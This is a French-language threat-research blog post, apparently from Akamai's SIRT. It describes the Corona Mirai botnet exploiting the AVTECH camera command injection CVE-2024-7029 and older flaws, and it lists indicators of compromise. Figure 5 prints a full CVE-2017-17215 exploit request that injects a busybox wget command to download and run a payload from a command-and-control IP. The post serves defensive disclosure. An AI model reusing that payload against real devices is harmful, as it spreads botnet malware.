Vous avez besoin du Cloud Computing ? Commencez dès maintenant

Méfiez-vous de ce qui ne peut être corrigé : Le botnet Corona Mirai se propage via Zero Day

Akamai Wave Blue

écrit par

Kyle Lefton, Larry Cashdollar, et Aline Eliovich

August 28, 2024

Vague bleue d'Akamai

écrit par

Kyle Lefton

Kyle Lefton est stagiaire en recherche sur la sécurité au sein de l'équipe SIRT (Security Intelligence Response Team) d'Akamai. Ancien analyste des renseignements pour le ministère de la Défense, Kyle a une expérience de plusieurs années dans la cyberdéfense, la recherche sur les menaces et le contre-espionnage. Il est fier d'étudier les menaces émergentes, de mener des recherches sur la vulnérabilité et de cartographier les groupes de menaces. Il aime passer son temps libre avec ses amis et sa famille, à jouer à des jeux de stratégie et à faire de la randonnée en plein air.

Larry Cashdollar

écrit par

Larry Cashdollar

Larry W. Cashdollar travaille dans le domaine de la sécurité en tant que chercheur en vulnérabilité depuis plus de 18 ans. Il est actuellement membre de l'équipe de réponse aux incidents de sécurité chez Akamai Technologies. Il a étudié l'informatique à l'Université du sud du Maine. Larry a documenté plus de 150 CVE (vulnérabilités et failles courantes) et a même présenté ses recherches à Bsides Boston, OWASP Rhode Island et Defcon. Il aime le plein air et reconstruit des moteurs de mini-motos pendant son temps libre.

Aline Eliovich

écrit par

Aline Eliovich

Forte de six années d'expérience dans le domaine de la sécurité, Aline Eliovich est actuellement chercheuse au sein de l'équipe Security Intelligence Response d'Akamai. Elle a étudié l'informatique au Holon Technology Institute. Aline aime utiliser différentes méthodes d'Open Source Intelligence (OSINT) pour ses recherches.

L'exploitation de cette vulnérabilité permet à un attaquant d'exécuter du code à distance sur un système cible.
L'exploitation de cette vulnérabilité permet à un attaquant d'exécuter du code à distance sur un système cible.

Commentaires éditoriaux et additionnels de Tricia Howard
Édité par Maria Vlasak

Synthèse

  • L'équipe SIRT (Security Intelligence and Response Team) d'Akamai a repéré une campagne de botnet qui exploite plusieurs vulnérabilités précédemment exploitées, ainsi qu'une vulnérabilité de type « Zero Day » découverte par l'équipe SIRT.

  • CVE-2024-7029 (découverte par Aline Eliovich) est une vulnérabilité d'injection de commande trouvée dans la fonction de luminosité des caméras de télévision en circuit fermé (CCTV) AVTECH qui permet l'exécution de code à distance (RCE).

  • Une fois la vulnérabilité injectée, le botnet diffuse une variante de Mirai dont les noms de chaînes font référence au virus COVID-19, observé depuis au moins 2020.  

  • Nous avons inclus une liste d'indicateurs de compromission (IOC) pour aider à lutter contre cette menace.

Introduction

L'équipe SIRT d'Akamai surveille un certain nombre de flux de renseignements internes et externes et y participe afin d'assurer la sécurité de nos données privées en ligne et de celles de nos clients. Nous avons découvert plusieurs menaces actives grâce à notre réseau mondial de leurre, y compris celle dont nous parlons aujourd'hui : CVE-2024-7029, découverte par Aline Eliovich.

Cette vulnérabilité RCE Zero Day a été découverte dans la fonction de luminosité des caméras IP AVTECH et permet une injection de commande pour diffuser une variante Mirai sur un système cible. Elle peut être exécutée à distance avec des privilèges élevés (propriétaire du processus en cours d'exécution). En août 2024, la CISA a émis un avis sur les systèmes de contrôle industriel (ICS) pour cette vulnérabilité, citant le manque de complexité de l'attaque, l'exploitation à distance et l'exploitation publique connue.

La campagne du botnet cible plusieurs vulnérabilités en dehors de CVE-2024-7029, y compris plusieurs vulnérabilités AVTECH, une RCE Hadoop Yarn, (CVE-2014-8361)et CVE-2017-17215. Cela s'inscrit dans la tendance inquiétante qu'ont les attaquants d'utiliser des vulnérabilités plus anciennes, probablement de faible priorité, qui n'ont pas été corrigées, à des fins malveillantes.

Rattrapage et correction

S'il y a un moment où il faut rattraper son retard en matière de correction, c'est bien maintenant, car bon nombre de ces vulnérabilités présentent un élément RCE. Pire encore, l'absence d'attribution formelle de CVE rend difficile le suivi du bogue, sans parler des correctifs.

Dans cet article de blog, nous allons décrire l' attaque Zero Day et son impact, puis présenter une liste complète d' indicateurs d'infection pour faciliter la détection ou les mesures d'atténuation.

Que signifie CVE-2024-7029 ?

En résumé, CVE-2024-7029 est une vulnérabilité dans les caméras IP AVTECH dans laquellel'argument « brightness »dans ledans le paramètre « action= »permet l'injection de commandes. L'acteur malveillant que nous avons observé a profité de cette vulnérabilité pour diffuser une variante Mirai avec des noms de chaînes faisant référence au virus COVID-19.

Depuis combien de temps est-elle active ?

La première campagne active que nous avons observée a débuté le 18 mars 2024, mais l'analyse a montré une activité pour cette variante dès décembre 2023. La démonstration de faisabilité (PoC) pour CVE-2024-7029 est accessible au public depuis au moins 2019, mais elle n'a jamais eu de propre affectation CVE jusqu'en août 2024.

Qui est concerné ?

Cette vulnérabilité dans les caméras IP AVTECH affecte jusqu'aux versions du micrologiciel AVM1203 FullImg-1023-1007-1011-1009. Bien que le modèle en question ne soit plus utilisé depuis plusieurs années, la CISA indique dans son avis que ces terminaux sont toujours utilisés dans le monde entier, y compris par les autorités de transport et d'autres entités responsables d'infrastructures critiques.

Comment ça marche ?

Cette vulnérabilité a été découverte à l'origine en examinant nos journaux de leurre. La figure 1 montre l'URL décodée pour plus de clarté.

Charge utile décodée Figure 1 : Corps de charge utile décodée des tentatives d'exploitation

La vulnérabilité réside dans la fonction de luminosité dans le fichier /cgi-bin/supervisor/Factory.cgi (Figure 2).

La vulnérabilité réside dans la fonction luminosité Figure 2 : Démonstration de faisabilité (PoC) de l'exploitation

Que pourrait-il se passer ?

Dans les exemples d'exploitation que nous avons observés, voici en substance ce qui s'est passé : L'exploitation de cette vulnérabilité permet à un attaquant d'exécuter du code à distance sur un système cible.

La figure 3 présente un exemple d'acteur malveillant exploitant cette faille pour télécharger et exécuter un fichier JavaScript afin de récupérer et de charger la charge utile principale du logiciel malveillant. À l'instar de nombreux autres botnets,celui-ci diffuse également une variante du logiciel malveillant Mirai à ses cibles.

La figure 3 présente un exemple d'acteur malveillant exploitant cette faille pour télécharger et exécuter un fichier JavaScript afin de récupérer et de charger la charge utile principale du logiciel malveillant. Figure 3 : Chaînes du téléchargeur JavaScript

Dans ce cas, le botnet utilise probablement la variante Corona Mirai, qui a été référencée par d'autres fournisseurs dès 2020 en relation avec le virus COVID-19. 

Une fois exécuté, le logiciel malveillant se connecte à un grand nombre d'hôtes via Telnet sur les ports 23, 2323 et 37215. Il imprime également la chaîne « Corona » sur la console sur un hôte infecté (figure 4).

Il imprime également la chaîne « Corona » sur la console sur un hôte infecté (figure 4).
 Il imprime également la chaîne « Corona » sur la console sur un hôte infecté (figure 4). Figure 4 : Exécution d'un logiciel malveillant affichant la sortie vers la console

L'analyse statique des chaînes de caractères dans les échantillons de logiciels malveillants montre que le chemin /ctrlt/DeviceUpgrade_1 est ciblé pour tenter d'exploiter les terminaux Huawei affectés par la norme CVE-2017-17215. Les échantillons comportent deux adresses IP de commande et de contrôle codées en dur, dont l'une fait partie du code d'exploitation CVE-2017-17215 (Figure 5). 

  POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
  Content-Length: 430
  Connection: keep-alive
  Accept: */*
  Authorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"

  <?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"><NewStatusURL>$(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 * /tmp/mips; /tmp/mips huawei.rep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Figure 5 : CVE-2017-17215 /ctrlt/DeviceUpgrade_1 exploitation de code

Le botnet a également ciblé plusieurs autres vulnérabilités, notamment une RCE Hadoop YARN, CVE-2014-8361 et CVE-2017-17215. Nous avons observé ces vulnérabilités exploitées sur le terrain à plusieurs reprises, et elles continuent d'être couronnées de succès.

Conclusion

Une vulnérabilité qui ne fait pas l'objet d'une assignation CVE officielle peut tout de même représenter une menace pour votre organisation. Cette vulnérabilité peut même constituer une menace importante. Les acteurs malveillants qui ont recours à ces botnets utilisent des vulnérabilités nouvelles ou peu connues pour faire proliférer des programmes malveillants. CVE-2024-7029 est un autre exemple d'utilisation de cette dernière méthode, qui devient une tendance d'attaque de plus en plus populaire observée par l'équipe SIRT.

Il existe de nombreuses vulnérabilités avec des exploitations publiques ou des PoC disponibles qui n'ont pas d'affectation CVE formelle et, dans certains cas, les terminaux ne sont pas corrigés. La gestion des priorités en matière de correctifs est difficile, en particulier lorsque les menaces n'ont pas de correctif disponible. S'il n'y a aucun moyen de remédier à une menace, la mise hors service du matériel et des logiciels est le moyen recommandé pour atténuer les risques de sécurité et réduire le risque d'amendes réglementaires.

Suivez-nous

L'équipe SIRT d'Akamai continuera à découvrir, surveiller et signaler les menaces telles que CVE-2024-7029 pour la sécurité de nos clients, de nos collègues et de l'ensemble de la communauté des spécialistes de la sécurité. Pour vous tenir au courant des dernières découvertes, vous pouvez nous suivre sur les réseaux sociaux ou consulter notre page consacrée aux études sur la sécurité.

Indicateurs de compromission (IOC)

Adresses IPv4
93.123.39[.]72
93.123.39[.]87
93.123.39[.]111
147.78.103[.]177
185.216.70[.]37
94.156.8[.]185
93.123.39[.]173
74.50.81[.]158
94.156.71[.]74
93.123.85[.]213
185.216.70[.]142
45.66.231[.]148
185.216.70[.]79
Hachages SHA256
15a1d52c529d314bb2b5fa8b8bd6c6a496609a283dd0e78e595c929e720d1b5b (« r »)
c0ae1eb249705f61d45ca747c91c02a411557a28792f4064c1d647abb580bc10 (« x86 »)
b0f7ef937d77061515907c54967a44da3701e0d2af143164bbf44bb4fc6f26af  (« sh »)
e82192fbe00bc7205abe786155bbfc0548f5c6ee9819a581e965526674f3cc57  (« mips »)
9e9e481bb448438572c2695469c85f773ddcd952025e45bee33bbfce2531c656  (« r »)
f4bf61fc335db4f3e7d7d89b534bc1e6ead66a51938e119ea340fe95039935e3  (« mips »)
22553be649f76a060ebbdfd410e295b66803e9c49d23369a726be2c5a25733ab  (« sh »)
135264de24d499877e95673b9cca737e488042813f41fef7817728a704323fe2  (« r »)
6ad5984bc9af7af6962a080bbb1a35bb56e8671c4b9c1d44e88da5a3f6b9aa82  (« r »)
947f517d3b833cc046b2ea0540aad199b7777fb03057122fb0b618828abdc212  (« r »)
8ac82a770cffbbc8fba73554d7caa117ef6d37ffee468665b95bc406449f91b5 (« r »)
5e264cb009c4d84b6180e47b9ceda3af8897b17b88fccc9c2914706d66abd1d1  (« r »)
372eefdc4bf9f4a4382db2762fcf9a9db559c9d4fff2ee5f5cf5362418caaa92  (« r »)
3995a7e7eb8eeafb0b6da2c3813e61d11993a820d478c87809136de79d8f8280  (« sh »)
40d8f662c187b53fd6fdeb70db9eb262b707e557d3fa4e5e4eacaeaa03ac45f2  (« r »)
4826b0194fbd924aa57b9c4ab1e017f0f45f547189374b0ea761d415fa4285ff  (« x86 »)
25945c4fe38ed2008f027bd1484b89867b23528c738812d317ddf57f48666b91  (« r »)
cfcae524309a220a48327c50bf32bf5ed3aed5698855b5da9f1ae932fb2df90c  (« x86 »)
774947944ea370592a30478bb3f26081799f7d7df975a6735e620d3442e7803b  (« x86 »)
06b1f09a62204472581e6aec381f96014bb6cc3fc1a9cef38bbcfe88bd82e499  (« r »)
4f50d318688c80f08eb7fad6f8788cae459c3420b3b9eb566f936edd7a780ae1  (« sh »)
c15bbfb85bfd8305fad8cc0e0d06cbe825e1e6fc6d8dbe5a8d1ac4243bd77d0c  (« x86 »)
0a566c39ecbc4107f954cb3e5e240ccaf0018dfac9b5062b4db7971fb3d9f413 (« x86 »)
2d7351aa765bb2feed9536cc392b2013361c193e99841c5b56591d988bd4b582  (« x86 »)
5d58f0fa54784e9c90825cba9e2052f691cdcfe85b0796a6379982832563090d (« x86 »)


Akamai Wave Blue

écrit par

Kyle Lefton, Larry Cashdollar, et Aline Eliovich

August 28, 2024

Vague bleue d'Akamai

écrit par

Kyle Lefton

Kyle Lefton est stagiaire en recherche sur la sécurité au sein de l'équipe SIRT (Security Intelligence Response Team) d'Akamai. Ancien analyste des renseignements pour le ministère de la Défense, Kyle a une expérience de plusieurs années dans la cyberdéfense, la recherche sur les menaces et le contre-espionnage. Il est fier d'étudier les menaces émergentes, de mener des recherches sur la vulnérabilité et de cartographier les groupes de menaces. Il aime passer son temps libre avec ses amis et sa famille, à jouer à des jeux de stratégie et à faire de la randonnée en plein air.

Larry Cashdollar

écrit par

Larry Cashdollar

Larry W. Cashdollar travaille dans le domaine de la sécurité en tant que chercheur en vulnérabilité depuis plus de 18 ans. Il est actuellement membre de l'équipe de réponse aux incidents de sécurité chez Akamai Technologies. Il a étudié l'informatique à l'Université du sud du Maine. Larry a documenté plus de 150 CVE (vulnérabilités et failles courantes) et a même présenté ses recherches à Bsides Boston, OWASP Rhode Island et Defcon. Il aime le plein air et reconstruit des moteurs de mini-motos pendant son temps libre.

Aline Eliovich

écrit par

Aline Eliovich

Forte de six années d'expérience dans le domaine de la sécurité, Aline Eliovich est actuellement chercheuse au sein de l'équipe Security Intelligence Response d'Akamai. Elle a étudié l'informatique au Holon Technology Institute. Aline aime utiliser différentes méthodes d'Open Source Intelligence (OSINT) pour ses recherches.